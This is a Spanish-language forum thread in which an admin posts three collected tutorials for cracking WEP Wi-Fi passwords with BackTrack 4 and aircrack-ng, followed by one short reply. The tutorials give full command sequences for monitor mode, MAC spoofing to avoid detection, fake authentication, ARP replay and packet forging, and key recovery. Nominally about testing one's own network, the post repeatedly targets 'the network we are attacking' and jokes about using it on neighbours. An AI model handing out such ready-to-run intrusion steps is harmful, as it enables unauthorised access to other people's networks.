Revolution Scanlation
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

No estás conectado. Conéctate o registrate

BackTrack 4

2 participantes

Ir abajo  Mensaje [Página 1 de 1.]

1BackTrack 4 Empty BackTrack 4 Sáb 26 Feb 2011, 23:17

Sir VVP

Sir VVP
Admin
Admin


aporte Tutos Variados de Backtrack 4 aporte

Acá les entrego unos tutos que he recolectado por internet , para que
vean la seguridad de su Wi-Fi . Este es un Live Cd , que se ejecuta
como linux y en cuestión de horas te averigua la clave del wi-fi en
cuestión .
Se los paso para que vean la seguridad de su red guardia .
Lo que ustedes hagan con él , está en el limite de su imaginación
chan .

Materiales :

BackTrack 4
[Tienes que estar registrado y conectado para ver este vínculo]

De ahí lo descargan


Primer Tuto

Cuando ya lo hayas bajado y quemado pues introduce el CD en tu cd-rom y
reinicia la computadora y has que se inicie desde el cd de backtrack)
cuando te pida usuario y contraseña usa los siguientes: Usuario: root
Contraseña: toor Introducelo todo en minusculas Luego cuando ya todo
cargue escribe lo siguiente: startx Esto es para que se inicie el modo
grafico. Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es
que ya cargo y esta listo para ser utilizado. Bueno ahora viene lo
bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng Aqui te va a decir cual es tu tarjeta inalambrica, lo normal
es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas
a dar cuenta de cual es, en mi caso es la wlan0. Luego introduce los
siguientes comandos: airmon-ng stop wlan0 ifconfig wlan0 down Con esto
deshabilitas la tarjeta de red inalambrica para hacerle un cambio de
mac, este con dos razones importantes: 1. Para que asi no haya
problemas de que te puedan detectar e impedirte futuras conexiones y 2.
Vas a necesitar el numero de mac mas adelante y esta es una facil de
escribir y recordar. Para cambiar la mac escribe los sigueintes
comandos: macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start
wlan0 Con el primer comando se cambio la mac de tu tarjeta de red por
00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de
red inalambrica (puede tardar un poco este ultimo comando) Ahora vas a
proceder a ver las redes inalambricas que estan a tu alcance con el
siguiente comando: airodump-ng wlan0 Va a salir la lista de las redes
inalambricas, donde dice el BSSID (mac del router que da la señal), PWR
(Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo
de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID
(Nombre de la red inalambrica). Se que son mas datos los que se
muestran, pero esos no son de importancia, solo vamos a utilizar los
que mencione. Cuando selecciones la red inalambrica que vamos a atacar
apreta Ctrl + C para parar el proceso y con el mouse sombrea todo el
BSSID de esa red y dale click derecho y copiar. Para explicar bien esta
parte vamos a poner un ejemplo: BSSID 66:77:88:99:00:11 CHN 6 ESSID
ejemplo Ahora para ponernos de modo monitor (para capturar paquetes) de
esa red pon el siguiente comando: airodump-ng -c 6 -w prueba --bssid
66:77:88:99:00:11 wlan0 Donde: -c es el numero del canal de la red que
estamos atacando -w es el archivo donde se van a guardar los paquetes
que captures (por defecto estan en la direccion /root) --bssid es la
mac del router de la red que estamos atacando wlan0 es nuestra tarjeta
inalambrica Ahora que ya estas capturando datos veras que hay una parte
que dice DATA, estos son los paquetes que llevamos capturados, para
poder descifrar una wep es necesario 20,000 paquetes. Te daras cuenta
que puede ir muy lento, esto significa que ninguna persona esta
utilizando la red entonces no esta generando trafico y te podria llevar
dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te
enseñare como generar trafico en la red. Para inyectarle trafico a la
red abre otra terminal (consola) donde introduciras los siguientes
comandos: aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e
ejemplo wlan0 Donde: -a es el bssid de la red que estamos atacando -h
es la mac falsa que le introducimos a tu tarjeta de red inalambrica -e
es el nombre de la red que estamos atacando Luego cuando salgan 4
lineas de codigos y te diga que la conexion esta succesfuld, esto
significa que estas conectado en capa 2 al router de la red que estamos
atacando. Si por alguna razon no se puede conectar algunas de las
razones son las siguientes: -La red a la que quieres atacar esta muy
lejos -Tu tarjeta de red no puede hacer inyeccion de paquetes -El
router tiene seguridad para evitar este tipo de ataques Ahora para
inyectarle el trafico introducce el siguientes comando: aireplay-ng -3
-b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0 Donde: -b es el bssid
de la red que estamos atacando -h es la mac falsa que le introducimos a
tu tarjeta de red inalambrica Veras que que se empezaron a inyectar
paquetes, si vas a ver a la otra terminal donde estas capturando los
paquetes te daras cuenta que la DATA va caminando muy rapido. Ahora
abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap Donde: -Prueba-01.cap es el archivo donde se
estan capturando los datos Deja que el comando se ejecute hasta que te
diga un mensaje KEY FOUND!!, esto significa que la contraseña se a
descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX] Donde las XX son las letras o numeros de la
contraseña, por ejemplo: Si te muestra [12:34:56:78:90] La contraseña
para esa red inalambrica seria 1234567890. Bueno para aquellos que
quieren probar aqui les pongo todos los comandos en el orden que debe
de ser para que solo le den copiar: # airmon-ng # airmon-ng stop wlan0
# ifconfig wlan0 down # macchanger –mac 00:11:22:33:44:55 wlan0 #
airmon-ng start wlan0 # airodump-ng wlan0 # airodump-ng -c (numero del
canal) -w nombrearchivo –bssid (bssid) wlan0 # aireplay-ng -1 0 -a
(bssid) -h 00:11:22:33:44:55 -e (essid) wlan0 # aireplay-ng -3 -b
(bssid) -h 00:11:22:33:44:55 wlan0 # aircrack-ng nombredelarchivo.cap
Como se daran cuenta son pocos comandos pero llevan mucha explicacion y
lo trate de hacer de una forma entendible, ya estoy trabajando en el
video, asi que no se preocupen si no entienden, pronto voy a sacar el
video donde igual voy a explicar los pasos. Para aquellos que quieren
probar otras formas de inyeccion aqui les dejo otras dos formas que me
han funcionado perfecto: Forma 2: # aireplay-ng -1 0 -a <bssid>
-h <mac> -e <essid> wlan0 # aireplay-ng -2 -p 0841 -c
ff:ff:ff:ff:ff:ff -h (MAC) wlan0 Verificar si el BSSID es el que
estamos atacando Forma 3: # aireplay-ng -1 0 -a <bssid> -h
<mac> -e <essid> wlan0 # aireplay-ng -5 -b <BSSID> -h
<mac> wlan0 ver como se llama el archivo .xor # packetforge-ng -0
-a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255
-y <archivo .xor> -w ARP # aireplay-ng -2 -r ARP wlan0 Cualquier
duda me la hacen saber y les tratare de ayudar en lo que pueda.


Segundo Tuto

Una vez conseguido el DVD-Live de Back Track 4 insertamos el DVD en la
unidad óptica y reiniciamos el PC. Según la bios de la placa tienes que
darle a F2 o Esc o F10…etc para entrar al menú de arranque, una vez
aquí seleccionar la unidad óptica y pulsar Enter. Una vez pulsado Enter
saldrá una ventana con varias opciones a elegir, elegir las dos
primeras de arriba que corresponden al Inicio con Resolucion 1024×768 o
con la Resolucion 800×600. Una vez cargue el Sistema, saldrá una
ventana de línea de comandos y debereis poner “startx” y empezará el
modo gráfico. Aquí empieza todo el proceso: Abrir un terminal para ver
que interfaz estamos usando, para ello escribid sin comillas:
“airmon-ng” Una vez sepamos nuestro interfaz procedemos a escanear la
red, volvemos a escribir en la misma terminal: “airodump-ng wlan0?
(wlan0, ath0,…etc es el interfaz) Cuando ya observemos que encuentra
nuestra red, cancelamos el proceso con Tecla Ctrl + Tecla C, abrir una
nueva terminal y escribimos en este caso para capturar balizas de señal
(Beacons) y paquetes de datos (#Data/s): “airodump-ng -w wep -c 11
–bssid ff:ff:ff:ff:ff:ff wlan0?
[airodump-ng -w (cifrado wep) -c (canal) --bssid(bssid) interfaz] //es
posible que no identifique la red y os pedirá que introduzcais el ESSID
( es el nombre de la red) en este caso pondremos [--essid
nombre_de_la_red]. Los datos de el canal y bssid deben ser los de
nuestra red wireless. Atencion: no detener el proceso hasta que
tengamos por lo menos 35.000 paquete de datos(#Data/s) El siguiente
paso es asociarnos a la red para ello abrimos una nueva terminal y
escribimos (se puede hacer mientras está capturando paquetes) el
siguente comando: “aireplay-ng -1 0 ff:ff:ff:ff:ff:ff:ff wlan0? Una vez
asociados en la misma terminal escribimos este comando para abrir/leer
los paquetes capturados en el comando antes puesto que sigue corriendo:
“aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0? Una vez obtenidos los
35.000 paquetes de datos como mínimo y leidos unos tantos miles
tambien, procedemos a crackear la contraseña. Primero debemos saber
como se llama el fichero donde se ha almacenado, para ello en la
terminal, escirbimos: “Dir” y copiamos el nombre del fichero .cap Una
vez realizado esto pasamos al último paso: “aircrack-ng
nombre_fichero.cap” Con este comando empezará a averiguar la contraseña
de nuestra wireless, si no la saca es que tiene buena seguridad o que
no as conseguido suficientes paquetes, pero dada que la autenticacion
es WEP, la sacará porque se ha quedado obsoleto y se puede averiguar la
contraseña como en este manual explico. Recomiendo poner de seguridad
WPA/PSK o WPA2

Opciones de comandos: –bssid = MAC del Punto de acceso/Router La MAC es
un es un identificador de 48 bits que corresponde de forma única a una
tarjeta de red. (ff:ff:ff:ff:ff:ff) -c canal = es el canal de nuestra
red puede oscilar del 1 al 11


Tercer Tuto

Saludos portalianos, aqui les traigo un tutorial en el cual enseñare a
romper claves wep utilizando backtrack 4.
Lo voy a poner con imagenes, y colores para que se vea bonito xd.
Empezemos, primero iniciamos el backtrack 4
Ahora el primer comando sera este:
Código:
sudo airmon-ng
Ahora les voy a explicar un poco, sudo es para tener privilegios de
super usuario, osea r00t y airmon-ng es la suite que nos permite poner
la tarjeta en modo managed o modo monitor.
El modo monitor es el que necesitaremos para poder "sniffear" lo
paquetes
ahora pasaremos al segundo comando, como vemos en la imagen me detecta
que mi interfaz es wlan0, bueno esa interface la utilizaremos para
poner nuestra tarjeta en modo monitor Código:
sudo airmon-ng start wlan0
Un poco de explicacion, como airmon-ng ya se los explique, ahora
"start" sirve para empezar osea poner la tarjeta en modo monitor y
"wlan0" es la interfaz que tenemos.
Como vemos en la imagen nos dice:
Interface : wlan0
Chipset : Atheros
Driver : ath5k (monitor mode enabled on mon0)
Bueno como veran la tarjeta ya esta en modo monitor pero ya no sera en
la interfaz "wlan0" ahora sera "mon0" porque es la que se puso en
monitor.
Ahora busquemos alguna señal para "snifear" para esto utilizaremos el
comando:
Código:
sudo airodump-ng mon0
en mi caso encontre dos redes, con encryptacion Wep, ahora anotaremos
algo importante que podria ser el Bssid o el Essid y el canal.
Cualquiera de los dos el bssid o el essid funciona pero en este caso
les enseñare con el bssid, y mi red esta en el canal 1 y utilizaremos
el siguiente comando.
Código:
sudo airmon-ng --channel 1 --write r00t mon0
Ahora les explicare un poco:
"sudo" privilegios de super usuario
"--channel" es para especificar el canal (es importante para que la
tarjeta solo snifee un canal y a la hora de inyectar no nos de error
porque la tarjeta no esta en el mismo canal que el AP o punto de acesso
o bueno al modem que queremos probar)
"--write" en este comando lo que hace es guardar la informacion de el
canal 1 por ejemplo las DATA que es lo importante que necesitamos para
desemcryptar la clave en este caso Wep.
"r00t" sera el nombre que le pondre al archivo "mon0" sera la interfaz
que esta en modo monitor continuemos
Ahora toca inyectar paquetes para que las "DATA" empiezen a crecer,
para esto utilizamos los comandos para poder asociarnos al modem:
Código:
sudo aireplay-ng -1 0 -a (aqui ira la direccion mac) mon0
como vemos en la imagen dice:
Sending authentication Request (open system)
Authentication sucessful
Sending Association Request(ACK)
Associacion successful :-) (AID:1)
los comandos que utilize son estos:
"sudo" ya lo explique
"aireplay-ng" es la aplicacion que nos permitira inyectar paquetes para
capturar DATAS.
"-1 0" es el ataque para asociarnos al modem, hay que tener en cuenta
que fue facil asociarnos porque en Sending authentication Request (open
system) es un sistema abierto.
"-a (aqui la direccion mac)" seria la mac del AP osea del modem o punto
de acceso.
"mon0" seria la interfaz en modo monitor como ya lo explique
ahora toca empezar a inyectar paquetes con la misma
aplicacionaireplay-ng este sera el comando:
Código:
sudo aireplay-ng -3 -b (aqui la direccion mac) mon0
de nuevo la explicacion:
"sudo" de nuevo lo mismo
"aireplay-ng" la aplicacion para inyectar paquetes
"-3" sera el ataque "-b (aqui la direccion mac)" sera la mac del AP o
access point
"mon0" sera la interfaz que esta en modo monitor
Despues pasara algo como esto o tambien se podria crear una lista
inmensa de envio de paquetes:
despues nos pasaremos a nuestra shell que dejamos abierta de
airodump-ng, donde estaba capturando paquetes y que lo estaba guardando
con el nombre r00t.
ahora hay que esperar un poco hasta tener un cantidad de paquetes entre
mas mejor asi ayudara a que la clave se encuentre mas rapido.
ahora toca desencryptar esos paquetes para eso utilizaremos la suite
Aircrack-ng entonces abrimos otra shell y tecleamos :
Código:
sudo aircrack-ng r00t 01.cap
luego de ejecutar el comando esperan un tiempo y listo, tienen la
clave

Acá esta el Tutorial por si necesitan imprimirlo
avion

[Tienes que estar registrado y conectado para ver este vínculo]

Ya
ahora solamente a descargar y a ser buenos vecinos ...
lol!

2BackTrack 4 Empty Re: BackTrack 4 Lun 25 Feb 2013, 20:03

Jac


Aspirante
Aspirante

Gracias ya habia hechoalgo asi en la universidad pero como no tengo a nadie cerca de mi casa con internet no lo he practicado

Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.